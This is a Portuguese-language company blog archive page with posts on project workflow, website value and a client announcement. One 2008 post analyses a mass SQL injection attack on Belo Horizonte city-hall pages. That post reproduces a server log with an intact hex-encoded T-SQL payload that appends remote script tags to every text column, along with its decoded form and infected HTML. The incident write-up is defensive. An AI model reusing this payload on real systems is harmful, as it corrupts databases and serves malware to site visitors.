este é o nosso blog

Aqui você encontrará um conteúdo bastante interessante, sobre temas variádos dentro de tecnologia, informática, internet e claro sobre o dia-a-dia da nossa empresa!

Arquivo da categoria: Clientes

.13/08/2010

Como funciona um projeto na Codificar?

Postado por:

Como funciona hoje um projeto (ideal) ?
  1. Fase de análise
  2. Design
  3. Recorte
  4. Programação
  5. Testes e Homologação
Atualmente, as fases mais recorrentes são: Análise Básica (definição de escopo) -> Design -> Recorte -> Programação -> Testes (rápidos e rasos) . Devido que grande parte do nossos trabalhos e clientes não exigem que as pontas desse processo seja bem delineada em atividades, pois a maioria das vezes o escopo é simples e as entregas também, como no caso de websites e pequenas melhorias em sistemas já desenvolvidos, ou ainda preferem colaborar nessas atividades para reduzirem custos.
E geralmente cadastramos como versões ou milestones (termo correto) as fases de design, recorte e programação no RedMine, nosso gerenciador de projetos, assim temos um controle efetivo das tarefas de cada profissional envolvido no projeto.
Logo então definimos uma data final para cada Versão, Milestone ou Entrega, pois dividimos as versões por entrega, por exemplo:
  • Na versão de design entregamos telas desenhadas em jpg para o cliente aprovar
  • Na versão de recorte entregamos o xhtml + css recortado aos desenvolvedores e caso o cliente necessite, demonstramos
  • Na versão de programação entregamos o que foi contratado já com suas funcionalidades definidas pelo escopo
Para cada uma das versões os trabalhos são divididos e tarefas são criadas com data de início e fim de modo que ao final as datas casem com a data final da versão, caindo assim no planejamento ideal das atividades.
Dado o planejamento correto, precisamos também que a execução seja dentro do planejado para que não ocorra atrasos e desgastes nas relações com nossos clientes.

Resumindo é basicamente isso… Abraços,

Raphael Canguçu

Comentários (0)

Permalink

.28/04/2010

A importância de um BOM SITE

Postado por:

Sites, sites e mais sites… A cada dia somos alvejados pela chuva de novos sites publicados na Internet e o grande dilema atual é a qualidade dessa imensa quantidade de informação e mídias disponibilizadas a cada dia na Internet. Ou seja, não adianta simplesmente estar na Internet, tem que deixar sua marca na Internet, é necessário prender visitantes ao seu site, seja por apelo visual ou pela qualidade da informação presente no mesmo.
A função da Codificar é entender qual será sua forma de aproximação com o seu público alvo e organizar isso de maneira que o visitante entre em seu site e seja fisgado, fique atraído pelo que vê.
Além do visual é necessário dinamismo, nenhum site se perpetua com as mesmas informações antigas. Quem visita seu site sempre irá querer saber as novidades, o que você e a sua empresa tem feito de novo, se existe um novo produto, um novo serviço, uma promoção ou uma notícia. Para permitir um fluxo adequado de informações em seu site a Codificar entrega cada site com um ambiente administrativo no qual você mesmo ou alguém de sua empresa, possa atualizar as informações presentes no site, dando dinamicidade às informações que achar necessário.
Atualmente a porta de entrada de um cliente para sua empresa é o seu site. Antigamente para encontrar de maneira ativa um produto ou serviço as pessoas interessadas abriam os catálogos, precisamente as páginas amarelas e procuravam na página correspondente a letra inicial do serviço ou empresa procurada. Hoje o processo é completamente diferente, se alguém quer encontrar algo, elas usam a Internet para isso. Elas obterão em sua máquina de busca preferida, por ex. o Google, e digitam o que querem encontrar e você tem de estar lá entre os primeiros registros listados se quiser ser encontrado. Por isso ter um site é muito importante e mais importante ainda é ter um site construído e otimizado pensado na necessidade de ser achado.
Para você não ter que se preocupar com isso, nós da Codificar já oferecemos nossos serviços com essa mentalidade, considerando que ser achado é a primeira necessidade de quem publica um site na internet.
Mas você já tem um site que não foi criado com essa visão? Não se preocupe, nós da CODIFICAR, temos serviço de otimização de sites já existentes para serem achados mais facilmente por máquinas de buscas, independente de tecnologia na qual ele foi criado.
Entre agora mesmo em contato conosco!!

Comentários (0)

Permalink

.11/09/2008

Vírus nas Páginas da prefeitura de Belo Horizonte (PBH) – SQL Injection

Postado por:

Hoje eu estava navegando nas páginas da PBH procurando um sistema web para reemissão de alvará de funcionamento para anos anteriores , pois desde que assumimos a Codificar  (antiga Tecnocom) em 2007 nunca nos notificaram que existia uma pendência na Taxa de Incêndio de 2004. Pendência aliás que está com um valor incorreto, pois as dimensões da empresa estão completamente erradas, quase 10x maior que a verdadeira.

Enfim vamos ao que interessa. Um erro muito comum e cometido por desenvolvedores menos experientes, ou ainda desorganizados é a permissividade de inserção de código malicioso via métodos get e post do protocolo HTTP. Ambos os métodos permitem que uma página web troque informações com um servidor web através de variáveis textuais de maneira muito simples e fácil. Contudo fica como obrigação do desenvolvedor tratar o recebimento dessas variáveis que muitas vezes podem conter código malicioso.

Em linguagens de programação mais modernas e melhores encapsuladas, ou ainda em frameworks que modernizam e melhoram certas LP’s há tratamento destes inputs, coibindo assim o ataque ao site.

O erro que vi no site da PBH já aconteceu alguns de nossos clientes que possuem sites/sistemas desenvolvidos em Linguagem de Programação ASP. Diga-se de passagem que não fomos nós da Codificar que desenvolvemos os sites/sistemas de nossos clientes, somente assumimos a manutenção quando o CIRCO já estava pegando fogo.

Geralmente o erro é explorado da seguinte forma:

  1. Site vulnerável em ASP
  2. Componentes de MDAC desatualizados no servidor windows
  3. Código malicioso inserido por SQL INJECTION utilizando valores hexadecimais que traduzidos correspodem a declaração de um cursor que vai em todos os campos textuais do banco de dados SQL Server e concatenam o código indevido.

Tal erro, além de ser uma falha de programação é também um erro em alguns componentes windows (item 2 acima) que não me lembro bem, mas na época em que ocorreu isso em 2 de nossos clientes que estavam hospedados na locaweb, indicamos a atualização dos mesmos ao suporte da locaweb.

Veja como o ataque é realizado através do log do servidor web onde um cliente da Codificar recebeu esse ataque:

2008-05-27 03:02:11 W3SVC13927 PLESKWIN12 200.23X.XXX.XXX GET /page.asp intIndex=85;DECLARE%20@S%
20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E61647739352E636F6D2F622E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));

EX3C(@S);– 80 – 77.237.76.98 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) – - www.CLIENTE-CODIFICAR.com.br 200 0 64 0 1413 49151

Segundo o MAXMIND.com site que possui serviços de georeferenciamento de IP’s, o IP 77.237.76.98 está localizado no IRAN:

Hostname Country Code Country Name Region Region Name City Postal Code Latitude Longitude ISP Organization Metro Code Area Code
77.237.76.98 IR Iran, Islamic Republic of 05 Kohkiluyeh va Buyer Ahmadi Gachsaran 30.3586 50.7981 Respina Networks & Beyond Respina Networks & Beyond

Pegando esse trecho em HEXA e transformado para ASCII temos:

DECLARE @T VARCHAR(255)"@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name"b.name FROM sysobjects a"syscolumns b WHERE a.id=b.id AND a.xtype="u" AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T"@C WHILE(@@FETCH_STATUS=0)
BEGIN EXEC("UPDATE ["+@T+"] SET ["+@C+"]=RTRIM(CONVERT(
 
VARCHAR(4000)"["+@C+"]))+""<scrip_t src=http://www_adw_95_com/_b.js></fechascript>""")
FETCH NEXT FROM Table_Cursor INTO @T"@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

Em tempo de execução da página web esse código é executado alterando todos textos do banco de dados.

Veja como ficou  a página afetada da PBH. (http://www.fazenda.pbh.gov.br/internet/pesquisas/consultas/resultado.asp?BuscaPalavra=alvar%E1&TipoBusca=A)

<table width="100%">
<tbody>
<tr>
<td colspan="2" width="100%" height="22" align="left" valign="top">
 
<hr size="1" noshade="noshade" />
 
</td>
</tr>
<tr>
<td width="15%" height="22" align="left" valign="top"><span style="color: #000000; font-family: Arial; font-size: x-small;"><strong>013/2002<script src="http://www.chinabnr.com/b.js"></script><script src="http://www.bnradw.com/b.js"></script> </strong></span><strong> </strong></td>
<td width="80%" height="22" align="left" valign="top"><span style="color: #000000; font-family: Arial; font-size: x-small;">"ISSQN - PROFISSIONAIS AUTÔNOMOS - OBRIGAÇÕES TRIBUTÁRIAS.Os profissionais autônomos, salvo os isentos do ISSQN, que exercerem suas atividades no território do Município, devem inscrever-se no cadastro mobiliário de contribuintes, recolher o ISSQN devido e comunicar as alterações cadastrais de interesse do fisco, inclusive o encerramento das atividades. Podem sujeitar-se ainda à incidência da Taxa de Fiscalização de Anúncios, se proprietário de engenho de divulgação de publicidade, e da Taxa de Fiscalização Sanitária, caso exerçam atividades que devam submeter-se à fiscalização específica.<script src="http://www.china_bnr_com/b_js">// <![CDATA[
</fecchascript><script src-"http://www_bnradw_com-b-js">
// ]]></script>"</span></td>
<td width="5%" height="22" align="left" valign="top"><span style="color: #000000; font-family: Arial; font-size: x-small;"><a onmouseover="MM_swapImage('Image791','','../../../dividativa/avanca_on.gif',1)" onmouseout="MM_swapImgRestore()" href="resultadoaction.asp?Bookmark=2&amp;BuscaPalavra=alvar%C3%A1&amp;TipoBusca=A"><img src="../../../dividativa/avanca.gif" border="0" alt="" width="16" height="16" /></a></span>
 
&nbsp;</td>
</tr>
</tbody>
</table>

 

Caso tenha um bom anti-virus e peça para visualizar o código fonte dessa página ou ainda entrar na pasta de cache do seu navegar ele irá acusar a presença do código malicioso.

Anteriormente já tinhamos anunciado a solução aqui em nosso blog:

 

  1. Coloque / inclua o script ASP fix_injection nos arquivos que fazem comunicação com o banco de dados, veja o código no post ASP – ANTI SQL INJECTION.
  2. Caso não houve perda dos dados dos campos textuais, use o script SQL de Busca e substituição postado em SEARCH AND REPLACE T-SQL.

Foi enviado um email para webmaster@pbh.gov.br com o link deste post para correção dos erros.

Caso não consiga solucionar o problema , ou possui problemas parecidos com esse de difícil solução em seu sistema/site entre em contato com a Codificar e peça um orçamento através do nosso formulário de contato.

Atenciosamente,

Raphael Canguçu.

Comentários (0)

Permalink

.26/04/2008

Perfil Antropológico

Postado por:

A codificar acaba de fechar mais um contrato. O cliente agora é a Perfil Antropológico .

Nós iremos desenvolver dois sistemas, um de avaliação psicológica e outro de recursos humanos.

Breve mais notícias sobre o desenvolvimento.

Comentários (0)

Permalink

© copyright 2011 Codificar Sistemas Tecnológicos | Todos os direitos reservados.